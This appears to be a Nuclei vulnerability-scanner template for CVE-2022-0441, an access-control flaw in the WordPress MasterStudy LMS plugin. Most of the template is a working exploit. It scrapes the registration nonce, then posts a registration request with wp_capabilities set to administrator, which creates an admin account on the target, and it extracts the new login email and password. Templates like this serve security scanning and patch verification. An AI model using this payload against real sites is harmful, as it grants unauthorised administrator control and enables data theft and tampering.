id: CVE-2022-0441

info:
  name: MasterStudy LMS <2.7.6 - Improper Access Control
  author: dwisiswant0,theamanrawat
  severity: critical
  description: |
    WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed
    - https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
    - https://plugins.trac.wordpress.org/changeset/2667195
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0441
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0441
    cwe-id: CWE-269
  metadata:
    verified: "true"
  tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,unauth

variables:
  username: "{{to_lower(rand_text_alphanumeric(6))}}"
  password: "{{rand_text_alphanumeric(12)}}"
  user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com"

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/json

        {"user_login":"{{username}}","user_email":"{{user_email}}","user_password":"{{password}}","user_password_re":"{{password}}","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - '"stm_lms_register":"([0-9a-z]+)"'
        internal: true

      - type: kval
        kval:
          - user_email
          - password

    req-condition: true
    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - 'Registration completed successfully'
          - '"status":"success"'
        condition: and

      - type: word
        part: header_2
        words:
          - application/json

      - type: status
        status:
          - 200

# Enhanced by md on 2023/04/06